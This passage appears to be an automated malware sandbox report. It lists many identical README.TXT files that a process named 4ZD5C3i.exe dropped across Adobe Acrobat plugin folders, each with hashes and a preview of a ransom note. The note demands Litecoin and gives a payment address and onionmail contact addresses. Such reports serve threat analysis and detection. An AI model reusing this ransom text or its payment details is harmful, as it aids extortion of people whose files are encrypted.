                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\mip\js\nls\root\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\mip\js\nls\ru-ru\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\mip\js\nls\sk-sk\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\mip\js\nls\sl-si\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\mip\js\nls\sl-sl\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\mip\js\nls\sv-se\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\mip\js\nls\tr-tr\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\mip\js\nls\uk-ua\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\mip\js\nls\zh-cn\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\mip\js\nls\zh-tw\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\ar-ae\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\ca-es\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\cs-cz\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\da-dk\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\de-de\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\en-ae\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
